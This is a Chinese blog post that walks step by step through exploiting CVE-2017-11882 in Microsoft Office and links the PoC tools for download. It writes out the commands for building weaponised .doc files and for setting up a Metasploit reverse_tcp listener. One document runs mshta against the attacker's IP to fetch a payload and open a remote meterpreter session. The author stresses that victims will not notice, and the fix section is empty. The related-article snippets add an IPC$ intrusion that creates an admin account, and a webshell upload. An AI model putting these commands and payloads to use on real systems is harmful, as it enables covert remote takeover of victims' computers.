linux经典漏洞复现,[漏洞复现] CVE-2017-11882 通杀所有office版本

最新推荐文章于 2024-08-07 19:00:57 发布
最新推荐文章于 2024-08-07 19:00:57 发布
阅读量930 收藏 9
点赞数 1
文章标签: linux经典漏洞复现

1176cec34462d978a247005dce549504.png

1、漏洞概述

这几个月来,针对微软Office套件最火热最流行的***手段,莫过于基于CVE-2017-11882的漏洞利用。

2017年11月14号,微软推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC***代码被逐渐公开。各路大神在Twitter和Github上相继公布自己的POC及对应的漏洞利用姿势,将这股烈火蔓延到2018年。

为什么这个漏洞会引起这么大的关注度呢?

从漏洞利用效果来看,它可以通杀Office 2003到2016的所有版本,并且整个***环境的构建非常简单,姿势又非常“优雅”。例如,有些***效果会出现弹框,会出现CPU飙高,会发生异常等等,而这个漏洞的利用效果,堪称“无色无味”。在后续实验过程中,大家可以自行体会。

更重要的是,这枚“通杀型”的Office高危漏洞,其实已经潜伏了17年之久,直到近几个月才被发现并低调修复……

那么,这个漏洞是怎么回事呢?简单来说:

此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,***者通过构造特殊的字符,可以实现任意代码执行。

举个例子,如果***利用这个漏洞,构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被***直接控制。

影响版本:

office 2003

office 2007

office 2010

office 2013

office 2016

2、漏洞复现环境

Kali Linux 2017.03 + Windows 7 + Office 2016

***机:Kali Linux + POC代码

靶机:Win7 + Office 2016

注:为了节省大家实验时间,我将此实验涉及到的工具全部上传到网盘。

链接:https://pan.baidu.com/s/17rrYP33Nv2-dNxS7wc1foA  密码:nbw2

3、实验流程

①下载office 2016

直接上msdn.itellyou.cn下载office 2016

df96c7b021cea3e1271c67839a2ffbc3.png

种子链接:ed2k://|file|cn_office_professional_plus_2016_x86_x64_dvd_6969182.iso|2588266496|27EEA4FE4BB13CD0ECCDFC24167F9E01|/

②安装office 2016

在Win7靶机中,安装office 2016套件,这里需要一些时间,大家也可以用其他windows和office版本来测试。

69331261d1ec57740dd94ff9472ecc73.png

③下载POC代码

Github上有很多大神分享针对这个漏洞的POC代码,但测试过程中,发现有些验证效果不出来,有些验证过程太复杂。

建议大家直接将我网盘分享的CVE-2017-11882文件夹下载下来,放到Kali Linux***机桌面。如下:

5ba5b2c9f1242d78d3b949e8ab8fc429.png

④进入shell终端,使用POC代码生成特殊改造的word文件

进入POC代码目录

root@kali:~/Desktop# cd CVE-2017-11882

查看文件root@kali:~/Desktop/CVE-2017-11882# ls

生成word文档11882.doc,打开doc文件之后,会弹出计算器(以此验证offce漏洞)

root@kali:~/Desktop/CVE-2017-11882# python CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o 11882.doc

生成word文档11882.doc,打开doc文件之后,会弹出任务管理器(以此验证offce漏洞)

root@kali:~/Desktop/CVE-2017-11882# python CVE-2017-11882.py -c "cmd.exe /c taskmgr.exe" -o 11882-2.doc

再次查看,可以看到多了两个doc文件

root@kali:~/Desktop/CVE-2017-11882# ls

ac5d925cabc626d8cfc6f39ecebae35b.png

⑤将文件拷贝到Win7靶机上,并验证效果

9a963eff417793568d5f32420e53026b.png

使用Word 2016打开第一个文件-11882.doc文件,查看效果:

691e829c510e6d4937c5bc20b219cd03.png

使用Word 2016打开第二个文件-11882-2.doc文件,查看效果:

3fcba4c1b1a695fddc39b62d4aaaddb3.png

可以看到,由于Office2016存在CVE-2017-11882漏洞,当打开特殊构造的word文件时,windows会执行其他动作。既然此漏洞能够造成win系统执行其他动作,那么,是否顺便可以反弹会话,直接被***机控制呢?答案是肯定的。接下来我们来做进一步的验证。

⑥在Kali Linux上构造带有shell后门的word文件,并开启监听

首先,为了后续更好的管理和使用***代码,可以将网盘中下载的代码”shell.rb”,名称修改为“cve-2017-11886.rb”

ee0963d59ba8f10f9f18947a6ea7e3e8.png

将CVE-2017-11882.rb拷贝到metasploit目录中,这里拷贝到目录/usr/share/metasploit-framework/modules/exploits/windows/smb

root@kali:~# cd /usr/share/metasploit-framework/modules/exploits/windows/smb

root@kali:/usr/share/metasploit-framework/modules/exploits/windows/smb# cp ~/Desktop/CVE-2017-11882/CVE-2017-11882.rb CVE-2017-11882.rb

root@kali:/usr/share/metasploit-framework/modules/exploits/windows/smb# ls

44968ad17f5dbad06c4040c074694757.png

进入Metasploit框架,搜索CVE-2017-11882:

root@kali:~# msfconsole

msf > search CVE-2017-11882

57f37afb49d2d8537b564ba06b72394d.png

使用CVE-2017-11882.rb模块,开启Meterpreter监听会话:

使用模块

msf > use exploit/windows/smb/CVE-2017-11882

设置tcp反弹会话

msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp

设置***机ip地址(这里通过ifconfig命令查看)

msf exploit(CVE-2017-11882) > set lhost 172.16.70.216

设置路径为11882,可自定义

msf exploit(CVE-2017-11882) > set uripath 11882

开启***,进入监听状态

msf exploit(CVE-2017-11882) > exploit

45fef4835f805632284653dc1d9db93d.png

使用CVE-2017-11882.py模块,生成带有shell的doc文件:

root@kali:~/Desktop/CVE-2017-11882# python CVE-2017-11882.py -c "mshta http://172.16.70.216:8080/11882" -o 11882-3.doc

此时,CVE-2017-11882目录中增加了另外一个word文件11882-3,而此文件的功能便是:打开它的电脑会反弹shell会话到控制机

63d48b8d06dc45182ffd3753666a2309.png

将文件11882-3.doc拷贝到靶机win7上面:

ddbb9114f03d2bc4ee3db9ffcb43ef18.png

在Win7打开11882-3.doc文件,此时观察Win7靶机和Kali Linux***机

注:做这个实验之前,首先要求***机Kali Linux和靶机Win7能够联通,例如在我的虚拟环境中,Kali Linux的ip地址是172.16.70.216,而Win7的地址是172.16.70.144,两个虚拟机采用NAT网卡模式。

5ed6ac66de0ba4ea3c2434209fa52349.png

当靶机打开文件时,整个过程没有任何弹框,也没有其他异常动作,整个***效果非常“优雅”,肉鸡很难发现。

此时,在另一段的Kali Linux***机,已经获取到shell会话。

71936dbda06c716b198bd44ff8d149d3.png

通过命令sessions查看meterpreter会话:

msf exploit(CVE-2017-11882) > sessions

28fd145120f8c14ab9be2002e47d7807.png

此后便可以通过meterpreter来对会话进行管理:

进入会话

msf exploit(CVE-2017-11882) > sessions 1

查看系统信息

meterpreter > sysinfo

查看当前用户

meterpreter > getuid

截屏

meterpreter > screenshot

32c86dfc45296372798cc6bd941b28fa.png

dea0735799a4be6c6ef35ca940997a12.png

可以看到,安装了最新office 2016版本的win7,因为CVE-2017-11882漏洞,当打开带有shell后门的doc文件时,kali***机可以获取到完美的后门并控制win7。

4、漏洞修复

=====================

【职位套餐】

①《CCIE魔鬼训练营套餐》:零基础到CCIE网络安全专家,包含CCNA/CCNP/CCIE不同等级的课程内容,涉及R&S、ISP、Security、***测试等课程内容,行业最经典,优惠幅度最大。课程链接:http://edu.51cto.com/pack/view/id-255.html

②《Web安全工程师》:掌握Web漏洞扫描、信息探测、SQL注入、文件上传、Webshell***、远程执行、XSS跨站脚本***、CSRF跨站请求伪造等核心技能。

③《高级Web安全工程师》:掌握Python编程、Web开发(Django)、Web安全,通往高级Web安全工程师。

正直boy
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
iis6.0版本的解析漏洞复现
Alonegrief的博客
12-10 1137
这里复现iis6.0服务器的文件解析漏洞采用墨者学院的靶场,来进行复现 目录解析: 启动靶场,访问该地址,F12,查看他的头部信息,发现他是iis6.0版本的 既然是iis6.0版本的服务器,我们可以考虑iis6.0的两个漏洞: 1、 目录解析 2、 文件解析 先上传一个文件上去,观察url的变化 发现页面是一个asp页面,在电脑上面创建一个asp的一句话木马,然后用bp抓包修改数据包,在upload后面加入webshell.asp文件名,使服务器创建一个webshell.asp文件,这样子的目的是为了使
CVE 2017-11882 office缓存溢出漏洞复现
BROTHERYY的博客
10-15 501
1.漏洞概述 针对这个漏洞,微软在2017年11月14号,推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC攻击代码被逐渐公开。 这里是poc地址 https://github.com/unamer/CVE-2017-11882 2.影响版本 office 2003 office 2007 office 2010 office 2013 office 2016 3.复现环境 渗透机:kali + POC代码【上述github地址】 靶机
Windows爆出核弹级漏洞CVE-2024-30078
鹿鸣天涯
06-22 883
目前仍可以获得安全更新的包括Windows Server 2008 SP2、Windows Server 2008 R2 SP1、Windows Server 2012 R2、Windows Server 2016、Windows Server 2019、Windows Server 2022、Windows 10、Windows 11所有受支持的版本。近日,微软发布了一项安全更新,以修复Windows操作系统中的一个高危漏洞,该漏洞编号为CVE-2024-30078,影响范围和潜在危害都非常大。
漏洞复现】常见框架漏洞复现 合集
最新发布
qq_48368964的博客
08-07 1214
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
CVE-2017-11882漏洞复现
weixin_30606461的博客
11-21 234
本文记录一下针对CVE-2017-11882漏洞复现 0x00 前言 参考backlion师傅的PDF,记录一下这个过程。 2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞CVE-2017-11882)。该漏洞Office内存破坏漏洞,影响目前流行的所有Office版本。攻击者可以利用漏洞以当前登录...
Office CVE-2017-11882漏洞复现
weixin_43268670的博客
07-08 524
Office cve-2017-11882漏洞,配上社工稳的一批,直接getshell 漏洞影响版本Office 365 Microsoft Office 2000 Microsoft Office 2003 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 Microsoft Office 2013 Service Pack 1 Microsoft Office ...
CVE-2017-11882CVE-2017-11882通杀Office 2003到2016)
03-04
从突破利用效果来看,它可以通杀Office 2003到2016的所有版本,并且整个攻击环境的内置非常简单。此突破是由Office软件里面的[公式编辑器]造成的,由于编辑器进程没有对举个例子,如果黑客利用这个漏洞,构造带有...
2002-2006年系统经典利用漏洞:ipc$
01-22
2002-2006年系统经典利用漏洞:ipc$ 2. 实例演示-完整入侵过程 (1)纯DOS命令式 入侵 首先构建一个入侵的环境,虚拟机之间能相互通信,即可表示为互联网环境,再扫描,得到有 漏洞的计算机IP net use \\192.168.38.129 /u:administrator ------------连接扫描到有漏洞大远程计算机(扫描远程电脑无密码)如果有密码 net use \\192.168.38.129 “” /u:administrator--- “”中要输入远程电脑的密码。 net use --------查看是否成功连接 net time \\192.168.38.129 ----查看对方电脑时间 at \\192.168.38.129 09:05 net user hnqdwxf2003 123 /add ---用at命令建立一个用户hnqdwxf2003密码123 at \\192.168.38.129 net localgroup administrators hnqdwxf2003 /add --提升为管理员权限 copy 拖进来\\192.168.38.129\c$ net time \\192.168.38.129 ----再次查看对方电脑时间 at \\192.168.38.129 时间 regedit /s c:\1.reg 或将对方电脑共享盘映射到本机 net use p:\\192.168.38.129 \c$ at \\192.168.38.129 时间 c:\1.bat 等待对方电脑重启,再连连接3389。 (2)利用开启telnet工具 (3)利用远控工具
CVE-2017-11882
12-09
CVE-2017-11882,用于创建钓鱼word,可以添加命令,用来反弹shell,可以用powershell
Office远程代码执行漏洞CVE-2017-11882漏洞复现
大河之犬的博客
06-26 1951
CVE-2017-11882允许攻击者在当前用户的上下文中运行任意代码,导致无法正确处理内存中的对象,即为“ Microsoft Office Memory Corruption Vulnerability “,栈溢出的远程执行漏洞。它的功能是打开office文本的同时能够弹出计算机程序,本实验通过此文本验证目标靶机上是否存在Office远程代码执行漏洞CVE-2017-11882漏洞。可以看到以下变化:ftp服务器启动。在靶机桌面上可以看到上步ftp上传的文件的文件,双击打开此文件,即可建立连接了。
[漏洞复现]office CVE-2017-11882
好好学习,天天向上
02-05 224
1、漏洞概述 此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。 举个例子,如果黑客利用这个漏洞,构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。 影响版本office 2003 office 2007 office 2010 o...
漏洞复现:DNS 缓存投毒的经典—— 2008年 kaminsky 漏洞
闵行小鱼塘
07-06 2510
最近研究DNS缓存投毒,那么经典的 kaminsky 漏洞自然是要尝试复现的。先用msf现成脚本,再根据理解自己写exp。巧合而又不幸的是:kaminsky大神陨落于2021.4.23,谨以此篇文章纪念大神传承遗志
漏洞复现|Microsoft Office数学公式编辑器内存损坏漏洞CVE-2017-11882
weixin_42282189的博客
10-26 407
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 1、漏洞简介 CVE-2017-11882是微软公布的一个远程执行漏洞,该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的ole数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出。 2、影响范围 office 2003 office 2007 office 2010 office 2013 office 2016 3、测试环境 win10:21H1 offi.
CVE-2017-11882复现
yiyiiyiy的博客
11-24 3226
CVE-2017-11882复现 前言漏洞基本信息 漏洞ID CVE-2017-11882 漏洞名称 Microsoft Office数学公式编辑器内存损坏漏洞 威胁类型 远程代码执行 漏洞类型 栈溢出,位于EQNEDT32.EXE组件中 漏洞影响版本Microsoft Office 2000 Microsoft Office 2003Microsoft Office 2007 Service
cve-2017-7504漏洞复现
08-23
您好!对于CVE-2017-7504漏洞复现,请注意以下几个步骤: 1. 确认受影响的软件版本CVE-2017-7504是一个Apache Struts 2框架中的远程代码执行漏洞。在复现之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 2. 搭建相应的环境:您可以在漏洞复现环境中使用Apache Struts 2漏洞测试框架,例如Metasploit或其他可用的漏洞测试工具。 3. 指定目标URL:使用合适的工具,指定目标URL以进行漏洞利用。通常,您需要提供目标系统上受影响的Struts 2应用程序的URL。 4. 发起攻击:使用漏洞利用工具执行相应的攻击代码。具体的攻击方法取决于您使用的工具和漏洞利用脚本。 请注意,漏洞复现属于未经授权的活动,可能违反法律法规,因此我们强烈建议仅在合法授权和合规测试范围内进行漏洞复现。此外,对于未经授权或非法目的使用该漏洞进行攻击是违法行为,且可能导致严重后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值